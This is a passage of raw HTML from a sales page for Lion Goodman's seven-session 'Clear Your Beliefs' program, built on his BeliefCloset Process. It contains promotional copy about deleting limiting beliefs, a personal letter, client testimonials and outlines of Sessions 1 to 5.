height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" 